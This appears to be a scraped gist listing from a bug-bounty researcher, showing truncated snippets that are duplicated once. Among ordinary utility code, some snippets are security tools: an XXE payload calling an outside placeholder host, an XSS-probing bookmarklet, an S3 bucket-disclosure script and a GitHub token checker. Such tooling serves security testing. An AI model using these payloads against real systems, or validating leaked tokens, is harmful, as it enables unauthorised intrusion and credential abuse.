Luke Stephens (hakluke) hakluke

## celery.sh
/* Useful celery config.

app = Celery('tasks',
             broker='redis://localhost:6379',
             backend='redis://localhost:6379')

app.conf.update(
    CELERY_TASK_RESULT_EXPIRES=3600,
    CELERY_QUEUES=(
        Queue('default', routing_key='tasks.#'),

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## go-build-all
#!/bin/bash
#
# GoLang cross-compile snippet for Go 1.6+ based loosely on Dave Chaney's cross-compile script:
# http://dave.cheney.net/2012/09/08/an-introduction-to-cross-compilation-with-go
#
# To use:
#
#   $ cd ~/path-to/my-awesome-project
#   $ go-build-all
#

## clone-popular.sh
#!/bin/bash

mkdir -p popular

while read repo;
do
	[ -d "popular/$repo" ] || svn export "https://plugins.svn.wordpress.org/$repo/trunk" "popular/$repo"
done <popular-plugins.txt

## limit_goroutines_with_semaphores.go
var (
  concurrency = 5
  semaChan = make(chan struct{}, concurrency)
)

func doWork(item int) {
  semaChan <- struct{}{} // block while full
  go func() {
    defer func() {
      <-semaChan // read releases a slot

## bulk_dns_check.py
# Usage: ./dns_check.py <list_of_domain_names.txt>
import dns.resolver
import requests
import re
import json
import sys

resolver = dns.resolver.Resolver()
resolver.timeout = 5
resolver.lifetime = 5

## XSSbookmarklet.js
javascript:(function()%7Bvar j %3D document.getElementsByTagName("input")%3Bif (document.location.href.indexOf("%3F")>-1)%7Bvar l %3D "%26"%3B%7Delse%7Bvar l %3D "%3F"%3B%7Dfor (i%3D0%3Bi<j.length%3Bi%2B%2B)%7Bl%2B%3Dj%5Bi%5D.getAttribute("name")%2B'%3D"><test1234>%26'%7Ddocument.location %3D document.location%2Bl%7D)()

## download_new_domains.py
from pymongo import MongoClient
import json, os, time, signal, threading, sys
from datetime import datetime, timedelta
from gglsbl import SafeBrowsingList

import requests
from datetime import datetime
from datetime import datetime, timedelta
from virus_total_apis import PrivateApi, PublicApi
import argparse

## bucket-disclose.sh
#!/bin/bash

# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"

## ghcheck
#!/bin/bash

GREEN='\033[0;32m'
RED='\033[0;31m'
END='\033[0m'

request=$(curl -s -u "hehe:$1" https://api.github.com/user)
name=$(echo "$request" | jq -r ".login" 2> /dev/null)
if [[ $name == "null" ]]; then
	echo -e "${RED}Not a GitHub access token.${END}"
	/* Useful celery config.

	app = Celery('tasks',
	broker='redis://localhost:6379',
	backend='redis://localhost:6379')

	app.conf.update(
	CELERY_TASK_RESULT_EXPIRES=3600,
	CELERY_QUEUES=(
	Queue('default', routing_key='tasks.#'),
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	#!/bin/bash
	#
	# GoLang cross-compile snippet for Go 1.6+ based loosely on Dave Chaney's cross-compile script:
	# http://dave.cheney.net/2012/09/08/an-introduction-to-cross-compilation-with-go
	#
	# To use:
	#
	# $ cd ~/path-to/my-awesome-project
	# $ go-build-all
	#
	#!/bin/bash

	mkdir -p popular

	while read repo;
	do
	[ -d "popular/$repo" ] \|\| svn export "https://plugins.svn.wordpress.org/$repo/trunk" "popular/$repo"
	done <popular-plugins.txt
	var (
	concurrency = 5
	semaChan = make(chan struct{}, concurrency)
	)

	func doWork(item int) {
	semaChan <- struct{}{} // block while full
	go func() {
	defer func() {
	<-semaChan // read releases a slot
	# Usage: ./dns_check.py <list_of_domain_names.txt>
	import dns.resolver
	import requests
	import re
	import json
	import sys

	resolver = dns.resolver.Resolver()
	resolver.timeout = 5
	resolver.lifetime = 5
	from pymongo import MongoClient
	import json, os, time, signal, threading, sys
	from datetime import datetime, timedelta
	from gglsbl import SafeBrowsingList

	import requests
	from datetime import datetime
	from datetime import datetime, timedelta
	from virus_total_apis import PrivateApi, PublicApi
	import argparse
	#!/bin/bash

	# Written by Frans Rosén (twitter.com/fransrosen)
	_debug="$2" #turn on debug
	_timeout="20"
	#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
	_aws_key="AKIA..."
	H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
	H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
	#!/bin/bash

	GREEN='\033[0;32m'
	RED='\033[0;31m'
	END='\033[0m'

	request=$(curl -s -u "hehe:$1" https://api.github.com/user)
	name=$(echo "$request" \| jq -r ".login" 2> /dev/null)
	if [[ $name == "null" ]]; then
	echo -e "${RED}Not a GitHub access token.${END}"